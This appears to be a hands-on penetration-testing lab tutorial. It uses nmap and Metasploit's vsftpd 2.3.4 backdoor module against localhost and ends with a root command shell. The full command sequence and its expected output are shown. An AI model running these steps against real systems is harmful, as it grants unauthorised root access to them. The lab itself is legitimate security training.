Introduction
In this lab, you will step into the role of a penetration tester and learn how to use the Metasploit Framework to exploit a known vulnerability in a common service. Specifically, you will target the vsftpd (Very Secure FTP Daemon) version 2.3.4, which contains a famous backdoor.
Metasploit is a powerful open-source penetration testing framework that makes hacking simple. It's an essential tool for security professionals. You will follow the standard penetration testing process: scanning the target to identify services, finding a suitable exploit, configuring it, and launching the attack to gain control of the target system. For this lab, your target machine will be the local environment (localhost).
Identify a vulnerable vsftpd service
In this step, you will perform reconnaissance, the first phase of any penetration test. The goal is to scan the target to discover open ports and identify the versions of the services running on them. This information is crucial for finding potential vulnerabilities. We will use nmap, a powerful network scanning tool, for this purpose.
First, open a terminal. We will scan our local machine, which acts as the target. The IP address for the local machine is 127.0.0.1.
Execute the following nmap command to perform a service version scan (-sV) on the target:
nmap -sV 127.0.0.1
After the scan completes, nmap will report the open ports and the services it identified. For this lab, we are interested in the FTP service running on port 21.
Your output should look similar to this. Note the version information for the FTP service.
Starting Nmap 7.80 ( https://nmap.org ) at ...
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0001s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in ... seconds
The output clearly shows that vsftpd 2.3.4 is running on port 21. This specific version is widely known to contain a backdoor, making it an ideal target for our exploit.
Select the vsftpd_234_backdoor exploit module
In this step, you will launch the Metasploit Framework and find the correct exploit module to attack the vsftpd 2.3.4 service.
First, start the Metasploit console. We use the -q (quiet) flag to skip the banner and start faster.
msfconsole -q
Once Metasploit is loaded, you will see the msf6 > prompt. Now, you can search for exploits related to vsftpd. Use the search command:
search vsftpd
Metasploit will display a list of matching modules. You should see an exploit specifically for the backdoor in vsftpd 2.3.4.
Matching Modules
================
## Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent Yes VSFTPD v2.3.4 Backdoor Command Execution
1 auxiliary/scanner/ftp/ftp_version normal No FTP Version Scanner
The exploit/unix/ftp/vsftpd_234_backdoor module is exactly what we need. It's ranked "excellent," which means it's highly reliable. To load this module, use the use command followed by the module's full name or its number from the search results.
use exploit/unix/ftp/vsftpd_234_backdoor
After you run the command, your prompt will change to msf6 exploit(unix/ftp/vsftpd_234_backdoor) >, indicating that the exploit module is now active.
Set the RHOSTS option to the target IP address
In this step, you will configure the exploit module. Most modules require you to set options, such as the target's IP address.
With the vsftpd_234_backdoor module loaded, you can view its options using the show options command.
show options
This command will display a table of all available options for this module, their current settings, and whether they are required.
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
As you can see, RHOSTS (Remote Hosts) is required, but it has no value set. You need to set this to the IP address of our target machine, which is 127.0.0.1.
Use the set command to configure the RHOSTS option:
set RHOSTS 127.0.0.1
To confirm that the option was set correctly, you can run show options again. You will see that RHOSTS now has the value 127.0.0.1.
Use the check command to verify the target is vulnerable
In this step, you will use a safe way to test if the target is actually vulnerable to the selected exploit. Metasploit provides a check command for many modules, which allows you to verify vulnerability without launching a full attack. This is useful for avoiding detection and system crashes.
Now that the exploit module is configured with the target's IP address, simply run the check command:
check
Metasploit will attempt to probe the target service to determine if the backdoor exists. If the target is vulnerable, you will see a confirmation message.
[+] 127.0.0.1:21 - The target is vulnerable.
The message [+] The target is vulnerable. confirms that the vsftpd service on 127.0.0.1 has the backdoor. You are now ready to launch the exploit. If the target were not vulnerable, it would typically report that the target is not exploitable.
Execute the exploit and gain a command shell
In this step, you will execute the exploit to gain unauthorized access to the target system. Since the check command confirmed the target is vulnerable, the exploit should succeed.
The command to launch the attack is exploit. You can also use its alias, run.
exploit
Metasploit will now send the malicious payload to the vsftpd service. The backdoor will be triggered, opening a command shell on a different port (port 6200 in this case). Metasploit will connect to this new shell, giving you direct command-line access to the target.
The output will look like this:
[*] 127.0.0.1:21 - Found the backdoor service on port 6200!
[*] 127.0.0.1:21 - Sending trigger...
[*] Command shell session 1 opened (127.0.0.1:38974 -> 127.0.0.1:6200) at 2023-10-27 10:30:00 -0400
You now have a command shell on the target machine! Notice the prompt has disappeared. You can now execute commands as if you were logged directly into the target. Let's verify our access level by running the whoami command.
whoami
The output should be:
root
This confirms you have gained a root shell, giving you complete control over the target system. To exit the shell and return to the Metasploit prompt, type exit.
Summary
Congratulations on successfully completing this lab! You have learned the fundamental workflow of a penetration test using the Metasploit Framework.
In this lab, you have:
- Used
nmapto perform reconnaissance and identify a vulnerablevsftpd 2.3.4service. - Launched the Metasploit console and searched for a relevant exploit.
- Selected and configured the
vsftpd_234_backdoorexploit module by setting theRHOSTSoption. - Safely verified the target's vulnerability using the
checkcommand. - Executed the
exploitcommand to gain a root-level command shell on the target system.
This exercise demonstrates how a simple, unpatched vulnerability can lead to a full system compromise. It highlights the importance of keeping software updated and the power of tools like Metasploit for both ethical hackers and malicious attackers.
